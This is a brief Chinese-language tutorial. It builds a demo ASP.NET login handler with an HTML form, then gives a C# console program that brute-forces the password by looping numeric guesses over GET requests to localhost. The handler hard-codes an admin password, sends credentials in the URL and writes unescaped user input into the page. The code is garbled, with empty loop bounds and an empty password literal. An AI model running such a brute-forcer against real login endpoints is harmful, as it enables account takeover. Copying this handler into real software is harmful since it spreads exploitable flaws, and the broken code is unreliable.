首先写出一段登陆程序:
//ashx端
<%@ WebHandler Language="C#" Class="AddCalation" %>
using System;
using System.Web;
public class AddCalation : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/html";
string ispostback=context.Request["isback"];
string username = context.Request["username"];
string password = context.Request["password"];
if (ispostback == "yes")
{
if (username == "admin" && password == "")
{
context.Response.Write("登陆成功");
}
else
{
context.Response.Write("登陆失败");
}
}
else
{
username = string.Empty;
password = string.Empty;
}
string path = context.Server.MapPath("AddCalation.html");
string content = System.IO.File.ReadAllText(path);
content=content.Replace("@user",username);
content = content.Replace("@pass", password);
context.Response.Write(content);
}
public bool IsReusable {
get {
return false;
}
}
}
//html端
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>加法计算器</title>
</head>
<body>
<form action="AddCalation.ashx">
<input type="hidden"value="yes"name="isback" />
<label for="user">用户名</label>
<input type="text" id="user" value="@user"name="username" />
<br />
<label for="pass">密码</label>
<input type="password" id="pass"value="@pass" name="password" />
<br /><input type="submit" value="登陆" />
</form>
</body>
</html>
然后写一段C#控制台程序进行暴力破解
using System;
using System.Collections.Generic;
using System.Linq;
using System.Net;
using System.Text;
using System.Threading.Tasks;
namespace PasswordBreak
{
class Program
{
static void Main(string[] args)
{
WebClient wc = new WebClient();
wc.Encoding = Encoding.UTF8;
string s="";
for (int i = ; i < ; i++)
{
s = wc.DownloadString("http://localhost:41566/AddCalation.ashx?isback=yes&username=admin&password=" + i);
if (s.Contains("登陆成功"))
{ Console.WriteLine(i); break; }
}
Console.WriteLine();
Console.Write(s);
Console.ReadKey();
}
}
}
通过循环依次试验密码来破解自己写的登陆代码中的密码
所以说登陆端口的安全性非常重要。
